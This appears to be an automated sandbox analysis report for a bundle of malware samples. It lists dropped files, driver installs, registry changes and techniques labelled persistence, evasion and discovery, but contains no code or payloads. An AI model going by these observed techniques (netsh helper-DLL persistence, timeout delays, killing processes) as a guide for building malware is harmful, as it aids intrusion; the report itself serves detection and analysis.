File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter64.ax C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\lib\droidcam.inf C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files\Winaero Tweaker\is-15QD7.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter32.ax C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\lib\droidcam.cat C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.cat C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\Licence.txt C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\loading.gif C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\With Stats.lnk C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-STKIK.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe N/A
File created C:\Program Files (x86)\DroidCam\adb\adb.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\adb\AdbWinUsbApi.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\usbmuxd.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.inf C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\Toggle HD Mode.lnk C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files (x86)\DroidCam\lib\install.bat C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\swscale-5.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.sys C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\avcodec-58.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\libwinpthread-1.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files\Winaero Tweaker\is-8PQ85.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-V39CU.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe N/A
File opened for modification C:\Program Files (x86)\DroidCam\vc_redist.x86.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\lib\droidcam.sys C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-43JC1.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-4CTO5.tmp C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files (x86)\DroidCam\vc_redist.x86.exe C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
File created C:\Program Files (x86)\DroidCam\avutil-56.dll C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.app.log C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\INF\oem2.PNF C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev2 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
File created C:\Windows\INF\oem2.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\oem2.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\setupact.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\setuperr.log C:\Windows\system32\DrvInst.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "282" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437219416" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 C:\Windows\SysWOW64\reg.exe N/A
